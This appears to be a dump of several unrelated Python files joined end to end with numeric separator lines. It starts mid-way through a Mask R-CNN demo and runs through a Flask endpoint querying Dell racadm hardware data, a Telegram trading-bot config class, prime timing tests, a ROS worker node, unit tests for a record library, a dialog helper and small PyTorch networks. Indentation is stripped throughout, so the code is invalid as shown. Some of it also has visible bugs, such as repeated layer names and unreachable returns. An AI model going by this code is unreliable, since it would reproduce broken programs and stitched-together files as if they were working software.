palette=torch.tensor([3, 32767, 2097151])
input_model=image2.cpu().squeeze(0), boxes.to(coco_demo.cpu_device), labels.to(coco_demo.cpu_device), masks.to(coco_demo.cpu_device), scores.to(coco_demo.cpu_device), palette
result_image1 = combine_masks_tuple(input_model)
pyplot.imshow(result_image1[:, :, [2, 1, 0]])
pyplot.show()
print("testing second image:")
image = processImage("test2.jpg",800,coco_demo)
image2 = processImageCPU("test2.jpg",800,coco_demo)
boxes, labels, masks, scores = loaded(image)
palette=torch.tensor([3, 32767, 2097151])
input_model=image2.cpu().squeeze(0), boxes.to(coco_demo.cpu_device), labels.to(coco_demo.cpu_device), masks.to(coco_demo.cpu_device), scores.to(coco_demo.cpu_device), palette
result_image1 = combine_masks_tuple(input_model)
pyplot.imshow(result_image1[:, :, [2, 1, 0]])
pyplot.show()
if __name__ == "__main__":
main()
| 7,340 | 2,774 |
#coding:utf-8
from flask import request,render_template, redirect,session
from . import app
from dbutil import DB
from collections import OrderedDict
import json
import datetime
# 基础
from dell_racadm import check_client_ip,check_dell_racadm_ip,dell_racadm_achieve_ip_info,achieve_dell_cacadm_comman,check_dell_racadm_info
# 数据信息
# 硬盘信息
from dell_racadm import check_dell_racadm_Physical_disk_format,achieve_disk_reportsclass_table_value,check_dell_racadm_Physical_disk_save
# 系统信息格式化 + 信息/网卡信息入库
from dell_racadm import check_dell_racadm_System_format,check_dell_racadm_System_Nic_info_save
# NIC网卡信息格式化
from dell_racadm import check_dell_racadm_NIC_CARD_format
# CPU信息
from dell_racadm import check_dell_racadm_cpu_info_format,check_dell_racadm_CPU_info_save
# 内存信息
from dell_racadm import check_dell_racadm_memory_info_format,check_dell_racadm_memory_info_save
# 前面板信息
from dell_racadm import check_dell_racadm_System_LCD_CurrentDisplay_save
# 传感器 状态 信息
# 传感器-内存
from dell_racadm import check_dell_racadm_Sensor_memory_format,check_dell_racadm_Sensor_memory_save
# 传感器-风扇
from dell_racadm import check_dell_racadm_Sensor_FAN_format,check_dell_racadm_Sensor_Fan_save
# 传感器-CPU
from dell_racadm import check_dell_racadm_Sensor_CPU_format,check_dell_racadm_Sensor_CPU_save
# 传感器-温度
from dell_racadm import check_dell_racadm_Sensor_TEMPERATURE_format,check_dell_racadm_Sensor_TEMPERATURE_save
# 传感器-电源
from dell_racadm import check_dell_racadm_Sensor_POWER_format,check_dell_racadm_Sensor_POWER_save
# 传感器-电池
from dell_racadm import check_dell_racadm_Sensor_BATTERY_format,check_dell_racadm_Sensor_BATTERY_save
# 此为用来传入IP以检查 并入库。暂未做限制;
# 经测试,应限制在300,警戒500的范围。
# 限制可以在调用此接口的那端限制
@app.route('/dell_racadm', methods=["GET"])
def dell_racadm():
if request.method == "GET":
client_ip = request.remote_addr
if check_client_ip(client_ip) == 'no':
# IP地址没在白名单 禁止访问
return '01'
IP_addr=request.args.get("IP_addr")
check_ip_Result=check_dell_racadm_ip(client_ip,IP_addr)
if check_ip_Result == 'no':
# 返回1 IP地址不在记录中
return '1'
achieve_ip_Result=dell_racadm_achieve_ip_info(client_ip,IP_addr)
if achieve_ip_Result == 'no':
# 返回 2 IP地址信息 获取错误
return '2'
check_time=datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# 先检测 racadm 是否可用
tmp_0 = achieve_dell_cacadm_comman('test_connect')
if tmp_0 == 'no':
# 返回 3 代表 无法获取测试用 racadm 命令
return '3'
tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
if tmp_1 == 'no' :
# 返回 4 代表 racadm 连接异常
return '4'
# 获取 磁盘信息 入库
tmp_0 = achieve_dell_cacadm_comman('achieve_disk')
tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
if tmp_1 != 'no':
tmp_2=check_dell_racadm_Physical_disk_format(tmp_1,IP_addr,check_time)
if tmp_2 != 'no':
need_state = achieve_disk_reportsclass_table_value('save_status_data_need')
tmp_3=check_dell_racadm_Physical_disk_save(IP_addr,achieve_ip_Result['id'],check_time,tmp_1,tmp_2,need_state)
# 获取 服务器型号 服务标签 快速服务代码 操作系统 电源状态 网卡 等等信息入库
tmp_0 = achieve_dell_cacadm_comman('achieve_NIC_and_System')
tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
if tmp_1 == 'no':
return '5'
# 获取 服务器型号 服务标签 快速服务代码 操作系统 电源状态 网卡 等等信息入库
# 服务器型号 服务标签 快速服务代码 操作系统 电源状态 格式化
need_state = achieve_disk_reportsclass_table_value('System_Information')
tmp_3=check_dell_racadm_System_format(tmp_1,IP_addr,check_time,need_state)
# 网卡信息格式化
tmp_4=check_dell_racadm_NIC_CARD_format(tmp_1,IP_addr,check_time)
# 入库操作
tmp_5=check_dell_racadm_System_Nic_info_save(achieve_ip_Result['id'],System_data=tmp_3,Nic_data=tmp_4)
# 硬件资源 内存 信息入库
tmp_0 = achieve_dell_cacadm_comman('achieve_Memory_info')
tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
if tmp_1 == 'no':
return '6'
tmp_2=check_dell_racadm_memory_info_format(tmp_1,IP_addr,check_time,achieve_ip_Result['id'])
if tmp_2 == 'no':
return '7'
tmp_3=check_dell_racadm_memory_info_save(achieve_ip_Result['id'],tmp_2)
# 硬件资源 CPU 信息入库
tmp_0 = achieve_dell_cacadm_comman('achieve_CPU_info')
tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
if tmp_1 == 'no':
return '8'
tmp_2 = check_dell_racadm_cpu_info_format(tmp_1,IP_addr,check_time,achieve_ip_Result['id'])
if tmp_2 == 'no':
return '9'
tmp_3 = check_dell_racadm_CPU_info_save(achieve_ip_Result['id'],tmp_2)
# 硬件信息 前面板信息获取
tmp_0 = achieve_dell_cacadm_comman('achieve_System_LCD')
tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
if tmp_1 != 'no':
check_dell_racadm_System_LCD_CurrentDisplay_save(achieve_ip_Result['id'],tmp_1)
# cpu 内存 温度 风扇 硬盘 主板等等信息(传感器)
tmp_0 = achieve_dell_cacadm_comman('achieve_sensorinfo')
tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
if tmp_1 == 'no':
return '10'
# 内存传感器信息格式化并入库
tmp_2=check_dell_racadm_Sensor_memory_format(tmp_1,check_time,achieve_ip_Result['id'])
if tmp_2 != 'no':
check_dell_racadm_Sensor_memory_save(achieve_ip_Result['id'],tmp_2)
# 风扇传感器信息格式化并入库
tmp_2=check_dell_racadm_Sensor_FAN_format(tmp_1,check_time,achieve_ip_Result['id'])
if tmp_2 != 'no':
check_dell_racadm_Sensor_Fan_save(achieve_ip_Result['id'],tmp_2)
# CPU传感器信息格式化并入库
tmp_2=check_dell_racadm_Sensor_CPU_format(tmp_1,check_time,achieve_ip_Result['id'])
if tmp_2 != 'no':
check_dell_racadm_Sensor_CPU_save(achieve_ip_Result['id'],tmp_2)
# 温度传感器信息格式化并入库
tmp_2=check_dell_racadm_Sensor_TEMPERATURE_format(tmp_1,check_time,achieve_ip_Result['id'])
if tmp_2 != 'no':
check_dell_racadm_Sensor_TEMPERATURE_save(achieve_ip_Result['id'],tmp_2)
# 电源传感器信息格式化并入库
tmp_2=check_dell_racadm_Sensor_POWER_format(tmp_1,check_time,achieve_ip_Result['id'])
if tmp_2 != 'no':
check_dell_racadm_Sensor_POWER_save(achieve_ip_Result['id'],tmp_2)
# 电池传感器信息格式化并入库
tmp_2=check_dell_racadm_Sensor_BATTERY_format(tmp_1,check_time,achieve_ip_Result['id'])
if tmp_2 != 'no':
check_dell_racadm_Sensor_BATTERY_save(achieve_ip_Result['id'],tmp_2)
return 'ok'
# return json.dumps(tmp_2, ensure_ascii=False)
else:
return redirect('/')
# cpu 内存 温度 风扇 硬盘 主板等等信息入库
@app.route('/save_cpu', methods=["GET"])
def save_cpu():
if request.method == "GET":
client_ip = request.remote_addr
if check_client_ip(client_ip) == 'no':
# IP地址没在白名单 禁止访问
return '01'
IP_addr=request.args.get("IP_addr")
check_ip_Result=check_dell_racadm_ip(client_ip,IP_addr)
if check_ip_Result == 'no':
# 返回1 IP地址不在记录中
return '1'
achieve_ip_Result=dell_racadm_achieve_ip_info(client_ip,IP_addr)
if achieve_ip_Result == 'no':
# 返回 2 IP地址信息 获取错误
return '2'
# 更新网卡
tmp_0 = achieve_dell_cacadm_comman('achieve_NIC_and_System')
if tmp_0 == 'no':
return '3'
tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
if tmp_1 == 'no':
# 返回 3 代表 racadm 连接异常
return '3'
check_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
need_state = achieve_disk_reportsclass_table_value('System_Information')
tmp_2=check_dell_racadm_System_format(tmp_1,IP_addr,check_time,need_state)
return json.dumps(tmp_2, ensure_ascii=False)
tmp_2 = check_dell_racadm_NIC_CARD_format(tmp_1,IP_addr,check_time)
if tmp_2 == 'no':
# 返回 4 代表 数据格式化失败,规则不匹配
return '4'
else:
return json.dumps(tmp_2, ensure_ascii=False)
return tmp_2
return '33'
| 8,736 | 3,904 |
import os
from configparser import RawConfigParser
import constants
import utils
class Config(RawConfigParser):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.disclaimer_section_header = "disclaimer"
self.telegram_section_header = "telegram"
self.telegram_dialog_section_header = "telegram_dialog_setting"
self.trade_account_section_header = "trade_account_setting"
self.trade_section_header = "trade_setting"
self.telegram_dialog_setting_prefix = "telegram_dialog_"
self.file_path = utils.get_dir_path_by_platform() + "setting.ini"
self.create_setting_file_when_not_exists()
self.read(self.file_path)
def create_setting_file_when_not_exists(self):
if not os.path.exists(self.file_path):
self[self.disclaimer_section_header] = {
'disclaimer_version': 'LOCAL',
'understand_and_agree': 'N'
}
self[self.telegram_section_header] = {
'api_id': '',
'api_hash': '',
'phone_number': ''
}
self[self.telegram_dialog_section_header] = {
'default_dialog_id': ''
}
self[self.trade_account_section_header] = {
'port': 11111
}
self[self.trade_section_header] = {
'trade_mode': constants.TradeMode.FIXED_QUANTITY,
'trade_product_hsi': 'Y',
'trade_product_mhi': 'N',
'hsi_trade_quantity': 1,
'mhi_trade_quantity': 1,
'hsi_margin': 150000,
'mhi_margin': 30000,
'trade_period_morning': 'Y',
'trade_period_afternoon': 'Y',
'trade_period_night': 'Y',
'open_extra_price': 0,
'close_price_adjust_interval': 1,
'cancel_unfulfilled_order_after_second': 10,
'trade_only_within_second': 3,
'manual_confirm_trade_message': 'Y'
}
self.save()
def get(self, section, code):
try:
return super().get(section, code)
except:
self.set(section, code, "")
self.save()
return ""
def save(self):
self.write(open(self.file_path, 'w'))
def get_disclaimer_version(self):
return self.get(self.disclaimer_section_header, "disclaimer_version")
def save_disclaimer_version(self, value):
self.set(self.disclaimer_section_header, "disclaimer_version", value)
self.save()
def get_disclaimer_understand_and_agree(self):
return self.get(self.disclaimer_section_header, "understand_and_agree")
def save_disclaimer_understand_and_agree(self, value):
self.set(self.disclaimer_section_header, "understand_and_agree", value)
self.save()
def save_telegram_dialog_setting(self, dialog_id, open_buy_template, close_buy_template, open_sell_template,
close_sell_template, time_format):
self[self.telegram_dialog_setting_prefix + str(dialog_id)] = {
'open_buy_template': open_buy_template,
'close_buy_template': close_buy_template,
'open_sell_template': open_sell_template,
'close_sell_template': close_sell_template,
'time_format': time_format
}
def get_telegram_dialog_setting(self, dialog_id):
try:
section_header = self.telegram_dialog_setting_prefix + str(dialog_id)
open_buy_template = self.get(section_header, 'open_buy_template')
close_buy_template = self.get(section_header, 'close_buy_template')
open_sell_template = self.get(section_header, 'open_sell_template')
close_sell_template = self.get(section_header, 'close_sell_template')
time_format = self.get(section_header, 'time_format')
return {
'open_buy_template': open_buy_template,
'close_buy_template': close_buy_template,
'open_sell_template': open_sell_template,
'close_sell_template': close_sell_template,
'time_format': time_format
}
except:
return None
def get_default_telegram_dialog_id(self):
return self.get(self.telegram_dialog_section_header, "default_dialog_id")
def save_default_telegram_dialog_id(self, value):
self.set(self.telegram_dialog_section_header, "default_dialog_id", value)
self.save()
def get_trade_port(self):
return self.get(self.trade_account_section_header, "port")
def save_trade_port(self, value):
self.set(self.trade_account_section_header, "port", value)
self.save()
def get_telegram_setting(self, code):
return self.get(self.telegram_section_header, code)
def set_telegram_setting(self, code, value):
self.set(self.telegram_section_header, code, value)
def get_trade_setting(self, code):
return self.get(self.trade_section_header, code)
def set_trade_setting(self, code, value):
self.set(self.trade_section_header, code, value)
| 5,275 | 1,643 |
from libs.primelib import Prime
import cProfile
import time
# Test variable's
primeindex = 100000
primecheck = 1000000000000
def main():
prime = Prime()
print('test 1:')
start = time.clock()
value = prime.getByIndex(primeindex)
end = time.clock()
print('value: ' + str(value))
print('time: ' + str(end - start))
print()
print('test 2:')
start = time.clock()
value = prime.getByIndex(primeindex)
end = time.clock()
print('value: ' + str(value))
print('time: ' + str(end - start))
print()
prime1 = Prime()
prime2 = Prime()
print('test 4:')
start = time.clock()
value = prime1.checkIfPrime(primecheck)
end = time.clock()
print('value: ' + str(value))
print('time: ' + str(end - start))
print()
print('test 5:')
start = time.clock()
value = prime1.checkIfPrime(primecheck)
end = time.clock()
print('value: ' + str(value))
print('time: ' + str(end - start))
print()
print('test 6:')
start = time.clock()
value = prime2.checkIfPrime(primecheck)
end = time.clock()
print('value: ' + str(value))
print('time: ' + str(end - start))
print()
print('test 7:')
start = time.clock()
value = prime2.checkIfPrime(primecheck)
end = time.clock()
print('value: ' + str(value))
print('time: ' + str(end - start))
print()
if __name__ == '__main__':
main()
| 1,430 | 519 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ROS
import rospy
from std_msgs.msg import String
# Robonomics communication
from robonomics_msgs.msg import Demand, Result
from ipfs_common.msg import Multihash
from ipfs_common.ipfs_rosbag import IpfsRosBag
class WorkerNode:
def __init__(self):
rospy.init_node("worker_node")
rospy.loginfo("Launching worker node...")
rospy.Subscriber('/liability/infochan/incoming/demand', Demand, self.on_incoming_demand)
self.result_publish = rospy.Publisher('/liability/infochan/eth/signing/result', Result, queue_size=128)
rospy.loginfo("The node is launched")
def on_incoming_demand(self, demand: Demand):
rospy.loginfo("Incoming demand: {}".format(demand))
if demand.model.multihash == rospy.get_param("~model"):
self.send_result(demand)
else:
rospy.loginfo("Demand is not for me")
def pack_result(self) -> Multihash:
topics = {
"/data": [
String("Hello from my sensor!")
]
}
bag = IpfsRosBag(messages=topics)
return bag.multihash
def send_result(self, demand: Demand):
rospy.loginfo("Collecting data...")
res = Result()
res.liability = demand.sender
res.result = self.pack_result()
res.success = True
rospy.loginfo("Result: {}".format(res))
self.result_publish.publish(res)
def spin(self):
rospy.spin()
if __name__ == "__main__":
WorkerNode().spin()
| 1,579 | 529 |
#!/usr/bin/env python
# encoding: utf-8
"""
copyright (c) 2016-2017 Earth Advantage. All rights reserved.
..codeauthor::Paul Munday <paul@paulmunday.net>
Unit tests for dubplate.
"""
# Imports from Standard Library
import datetime
import json
import sys
import six
import unittest
# Imports from Third Party Modules
from frozendict import frozendict
# Local Imports
from dubplate import Record, empty_slot
PY3 = sys.version_info[0] == 3
if PY3:
from unittest import mock
else:
import mock
# Constants
NS = 'http://example.org/ns'
NAMESPACE = {'n': NS}
class TstRecord(Record):
# pylint:disable=slots-on-old-class,too-few-public-methods
__slots__ = ['service', 'test']
def __init__(self, service, test, **kwargs):
self.service = service
self.test = test
super(TstRecord, self).__init__(**kwargs)
class FieldRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
fields = ('a', 'b', 'c')
non_null_fields = ('a', 'b')
class RequiredFieldRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
non_null_fields = ('a', 'b')
class RequireAllFieldsRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
fields = ('a', 'b', 'c')
non_null_fields = ('a', 'b')
require_all_fields = True
class HashIndexRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
hash_index_fields = ('a', 'b')
class HashIndexSlotsRecord(TstRecord):
# pylint:disable=slots-on-old-class,too-few-public-methods
hash_index_fields = ('test', 'a', 'b')
class RecordTests(unittest.TestCase):
"""Test base record class"""
def setUp(self):
self.rdict = {'color': 'red', 'number': 10}
self.record = TstRecord('service', 'test', **self.rdict)
def test_record_access(self):
# test attributes and record data set
self.assertEqual(self.record.test, 'test')
self.assertEqual(self.record['color'], 'red')
# test difference between attributes and record data
with self.assertRaises(KeyError) as conm:
# pylint:disable=pointless-statement
self.record['test']
self.assertEqual(str(conm.exception), "'test'")
with self.assertRaises(AttributeError) as conm:
# pylint:disable=pointless-statement,no-member
self.record.color
self.assertEqual(
str(conm.exception), "'TstRecord' object has no attribute 'color'"
)
def test_is_immutable(self):
with self.assertRaises(TypeError) as conm:
self.record.test = 1
self.assertEqual(
str(conm.exception),
"'TstRecord' object does not support attribute assignment"
)
with self.assertRaises(TypeError) as conm:
self.record['number'] = 1
self.assertEqual(
str(conm.exception),
"'TstRecord' object does not support item assignment"
)
with self.assertRaises(TypeError) as conm:
del self.record.test
self.assertEqual(
str(conm.exception),
"'TstRecord' object does not support attribute deletion"
)
with self.assertRaises(TypeError) as conm:
del self.record['number']
self.assertEqual(
str(conm.exception),
"'TstRecord' object does not support item deletion"
)
def test_repr(self):
# TODO: the dict portion makes this test intermittently problematic
# self.assertEqual(
# repr(self.record), "<TstRecord, {'color': 'red', 'number': 10}>"
# )
pass
def test_dict_like(self):
self.assertIn('color', self.record)
self.assertNotIn('test', self.record)
self.assertEqual(self.record, {'color': 'red', 'number': 10})
self.assertNotEqual(self.record, {'color': 'red', 'number': 1})
self.assertEqual(len(self.record), 2)
# hash is hash of record
fdt = frozendict({'color': 'red', 'number': 10})
self.assertEqual(hash(self.record), hash(fdt))
self.assertEqual(self.record.get('color', 'blue'), 'red')
self.assertNotEqual(self.record.get('color', 'blue'), 'blue')
self.assertEqual(self.record.get('other', 'blue'), 'blue')
six.assertCountEqual(
self,
list(self.record.items()), [('color', 'red'), ('number', 10)]
)
self.assertDictEqual(
{'color': 'red', 'number': 10},
{key: val for key, val in self.record.items()}
)
six.assertCountEqual(
self,
['color', 'number'], list(self.record.keys())
)
six.assertCountEqual(
self,
['color', 'number'], [key for key in self.record.keys()]
)
six.assertCountEqual(
self,
['red', 10], list(self.record.values())
)
six.assertCountEqual(
self,
['red', 10], [value for value in self.record.values()]
)
def test_non_null_fields(self):
# raises error if attribute not set
with self.assertRaises(KeyError) as conm:
RequiredFieldRecord('red', 1, a=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following field is required: b'"
)
with self.assertRaises(KeyError) as conm:
RequiredFieldRecord('red', 1, d=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following fields are required: a, b'"
)
# raises errror if required field is None
with self.assertRaises(KeyError) as conm:
RequiredFieldRecord('red', 1, a=2, b=None)
self.assertEqual(
str(conm.exception),
"'The following field can not be None: b'"
)
with self.assertRaises(KeyError) as conm:
RequiredFieldRecord('red', 1, a=None, b=None)
self.assertEqual(
str(conm.exception),
"'The following fields can not be None: a, b'"
)
# ok to set extra fields if fields not defined
rec = RequiredFieldRecord('red', 1, a=1, b=2, c=3)
# if we are here no error raised
assert rec
def test_fields(self):
# test rejects extra fields
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, b=3, c=4, d=5)
self.assertEqual(
str(conm.exception),
"'Extra keys: d. "
"Only the following keys can be used in the record: a, b, c'"
)
# test ok
rec = FieldRecord('red', 1, a=2, b=3, c=4)
assert rec
# test ok for non-required fields to be None
rec = FieldRecord('red', 1, a=2, b=3, c=None)
assert rec
# test required fields
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following field is required: b'"
)
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, d=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following fields are required: a, b'"
)
# raises errror if required field is None
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, b=None, c=None)
self.assertEqual(
str(conm.exception),
"'The following field can not be None: b'"
)
# test ordering
rec = FieldRecord('red', 1, a=2, c=4, b=3)
expected = ['a', 'b', 'c']
result = [key for key in rec.keys()]
self.assertEqual(expected, result)
def test_require_all_fields(self):
# test requires all fields
with self.assertRaises(KeyError) as conm:
RequireAllFieldsRecord('red', 1, a=2, b=3)
self.assertEqual(
str(conm.exception),
"'Missing keys: c. "
"The following keys must be used in the record: a, b, c'"
)
# test rejects extra fields
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, b=3, c=4, d=5)
self.assertEqual(
str(conm.exception),
"'Extra keys: d. "
"Only the following keys can be used in the record: a, b, c'"
)
# test ok
rec = FieldRecord('red', 1, a=2, b=3, c=4)
assert rec
# test ok for non-required fields to be None
rec = FieldRecord('red', 1, a=2, b=3, c=None)
assert rec
# test required fields
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following field is required: b'"
)
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, d=2, c=3)
self.assertEqual(
str(conm.exception),
"'The following fields are required: a, b'"
)
# raises errror if required field is None
with self.assertRaises(KeyError) as conm:
FieldRecord('red', 1, a=2, b=None, c=None)
self.assertEqual(
str(conm.exception),
"'The following field can not be None: b'"
)
# test ordering
rec = FieldRecord('red', 1, a=2, c=4, b=3)
expected = ['a', 'b', 'c']
result = [key for key in rec.keys()]
self.assertEqual(expected, result)
def test_copy_record(self):
"""Test copy_record method"""
copy = self.record.copy_record()
self.assertEqual(copy, self.rdict)
copy = self.record.copy_record(color='green')
self.assertEqual(copy, {'color': 'green', 'number': 10})
# ensure extra/incorrect fields can't be set
record = FieldRecord('red', 1, a=2, b=3, c=4)
self.assertRaises(
KeyError, record.copy_record, colorx='green'
)
# ensure non-null fields can't be set to None
self.assertRaises(
KeyError, record.copy_record, a=None
)
def test_json(self):
"""Test json() method"""
dtime = datetime.datetime(2001, 1, 1, 1, 1, 1, 100)
date = datetime.date(2001, 1, 1)
json_record = TstRecord(
service='service', test='test',
string='test', integer=1,
datetime=dtime, date=date,
lst=[dtime, date],
tpl=(dtime, date),
dictionary=dict(datetime=dtime, date=date)
)
dtime_str = '2001-01-01T01:01:01'
date_str = '2001-01-01'
result = json_record.json()
self.assertIsInstance(result, str)
result = json.loads(result)
self.assertNotIn('service', result)
self.assertNotIn('test', result)
self.assertEqual(result['string'], 'test')
self.assertIsInstance(result['integer'], int)
self.assertEqual(result['integer'], 1)
self.assertEqual(result['datetime'], dtime_str)
self.assertEqual(result['date'], date_str)
self.assertEqual(result['lst'], [dtime_str, date_str])
self.assertEqual(result['tpl'], [dtime_str, date_str])
result = result['dictionary']
self.assertIsInstance(result, dict)
self.assertEqual(result['datetime'], dtime_str)
self.assertEqual(result['date'], date_str)
json_record2 = TstRecord(
service='service', test='test',
record=json_record
)
result = json_record2.json()
self.assertIsInstance(result, str)
result = json.loads(result)
self.assertNotIn('service', result)
self.assertNotIn('test', result)
result = result['record']
self.assertIsInstance(result, dict)
self.assertNotIn('service', result)
self.assertNotIn('test', result)
self.assertEqual(result['string'], 'test')
self.assertIsInstance(result['integer'], int)
self.assertEqual(result['integer'], 1)
self.assertEqual(result['datetime'], dtime_str)
self.assertEqual(result['date'], date_str)
self.assertEqual(result['lst'], [dtime_str, date_str])
self.assertEqual(result['tpl'], [dtime_str, date_str])
result = result['dictionary']
self.assertIsInstance(result, dict)
self.assertEqual(result['datetime'], dtime_str)
self.assertEqual(result['date'], date_str)
def test_empty_slot(self):
"""Test empty_slot"""
service = getattr(TstRecord, 'service')
self.assertTrue(isinstance(service, empty_slot))
@mock.patch('dubplate.generate_hash_index_key')
def test_get_hash_index_key(self, mock_hash_index_key):
"""Test get_hash_index_key"""
mock_hash_index_key.return_value = ''
rec = TstRecord('service', 'test', a=1, b=2)
rec.get_hash_index_key()
mock_hash_index_key.assert_called_with(
rec.__class__.__name__, [], rec
)
fields_rec = FieldRecord('service', 'test', a=1, b=2)
fields_rec.get_hash_index_key()
mock_hash_index_key.assert_called_with(
fields_rec.__class__.__name__, fields_rec.fields, fields_rec
)
hash_rec = HashIndexRecord('service', 'test', a=1, b=2)
hash_rec.get_hash_index_key()
mock_hash_index_key.assert_called_with(
hash_rec.__class__.__name__, hash_rec.hash_index_fields, hash_rec
)
slot_rec = HashIndexSlotsRecord('service', 'test', a=1, b=2)
slot_rec.get_hash_index_key()
expected_val_dict = frozendict({'test': 'test', 'a': 1, 'b': 2})
mock_hash_index_key.assert_called_with(
slot_rec.__class__.__name__, slot_rec.hash_index_fields,
expected_val_dict
)
| 14,009 | 4,454 |
import subprocess
import cli
def ask(message, choices=None, options=None):
options = {"text": f"<big>{message}</big>"} | (options or {})
if choices is None:
res = run("entry", options=options)
res = res and res.strip()
elif isinstance(choices, list):
res = ask_choices(choices, options=options)
elif isinstance(choices, dict):
res = ask_choices(list(choices.keys()), options=options)
res = res and choices[res]
else:
raise Exception("Choices parameter not valid")
return res
def ask_choices(choices, options=None):
display_mapping = {
c[:100]: c for c in choices
} # limit length of displayed options to prevent errors
separator = "###"
options = {"separator": separator, "no-headers": None} | (options or {})
items = ["--column=text", "--column=@font@"] + [
v for c in display_mapping for v in (c, "Monospace 15")
]
res = run("list", args=items, options=options)
res = res and res.split(separator)[0]
res = res and display_mapping[res]
return res
def run(subcommand, args=None, options=None):
args = args or []
options = {
"geometry": "907x514+500+200",
"title": "",
"text-align": "center",
"icon-theme": "Win11",
"fontname": "Noto Sans 40",
} | (options or {})
result = cli.get("yad", f"--{subcommand}", *args, options, check=False)
return result
def ask_yn(question):
res = subprocess.run(("kdialog", "--yesno", question), capture_output=True)
return res.returncode == 0
| 1,582 | 518 |
# DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
#
# This material is based upon work supported by the Assistant Secretary of Defense for Research and
# Engineering under Air Force Contract No. FA8721-05-C-0002 and/or FA8702-15-D-0001. Any opinions,
# findings, conclusions or recommendations expressed in this material are those of the author(s) and
# do not necessarily reflect the views of the Assistant Secretary of Defense for Research and
# Engineering.
#
# © 2018 Massachusetts Institute of Technology.
#
# MIT Proprietary, Subject to FAR52.227-11 Patent Rights - Ownership by the contractor (May 2014)
#
# The software/firmware is provided to you on an As-Is basis
#
# Delivered to the U.S. Government with Unlimited Rights, as defined in DFARS Part 252.227-7013 or
# 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government rights in this work are
# defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed above. Use of this work other than
# as specifically authorized by the U.S. Government may violate any copyrights that exist in this
# work.
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.autograd import Variable
import numpy as np
import torch
from matplotlib import pyplot as plt
import matplotlib.cm as cm
from collections import defaultdict
from collections import OrderedDict
class NumberNet(nn.Module):
"""
SimpleNetwork that classifies floats into integers
The network is supposed to be small enough that we can visualize the entire thing
and understand what it is doing.
"""
def __init__(self):
super(NumberNet, self).__init__()
self.layer = nn.Linear(1, 5)
def forward(self, x):
return self.layer(x).view(-1, 5)
class DeepNumberNet(nn.Module):
"""
NumberNet but with a bunch of layers
"""
def __init__(self):
super(DeepNumberNet, self).__init__()
self.model = nn.Sequential(OrderedDict([
('layer1', nn.Linear(1, 20)),
('activation1', nn.LeakyReLU()),
('layer2', nn.Linear(20, 20)),
('activation2', nn.LeakyReLU()),
('layer2', nn.Linear(20, 20)),
('activation2', nn.LeakyReLU()),
('layer3', nn.Linear(20, 20)),
('activation2', nn.LeakyReLU()),
('layer3', nn.Linear(20, 20)),
('activation4', nn.LeakyReLU()),
('layer4', nn.Linear(20, 20)),
('activation5', nn.LeakyReLU()),
('layer5', nn.Linear(20, 20)),
('activation5', nn.LeakyReLU()),
('layer6', nn.Linear(20, 20)),
('activation6', nn.LeakyReLU()),
('layer11', nn.Linear(20, 5)),
('activation11', nn.LeakyReLU())
]))
def forward(self, x):
output = self.model(x)
return output.view(-1, 5)
def dsig(x):
"""
4 e^x
----
(e^x + 1)^2
"""
expo = torch.exp(x)
expo_plus_one = expo + 1
square = expo_plus_one * expo_plus_one
return expo.div(square) * 4
class DSigNet(nn.Module):
"""
A simple network to test the dsig activation.
The intuition behind the dsig activation:
Monotonic activations break up the input space into a collection of half spaces.
The Universal Approximation Theory tells us that neural networks can approximate
any function within a finite domain. For classification tasks, neural networks approximate
a probability distribution. Half spaces do not constrain themselves to a finite
domain, so neural networks which are made up of a collection of half spaces will
inevitable produce high probability estimates for out of domain examples.
So instead of building a neural network which is a collection of half spaces, lets
build a network which is a collection of completely bounded spaces. A network like this
will require more nodes to approximate the same function. Potentially many many more nodes,
because you will need a node for each section of the input, whereas before many thousands
of sections could be classified with one halfspace. On the other hand a collection of
bounded spaces will do a better job at approximating the domain.
"""
def __init__(self):
super(DSigNet, self).__init__()
self.layer = nn.Linear(1, 5)
def forward(self, x):
return dsig(self.layer(x)).view(-1, 5)
def plot_decision_boundary(number_net, numbers, span=(-10, 1)):
lower, upper = span
plt.ylim(-0.2, 1.2)
plt.xlim(lower, upper)
plt.xticks([i for i in range(lower, upper+1) if i % 5 == 0])
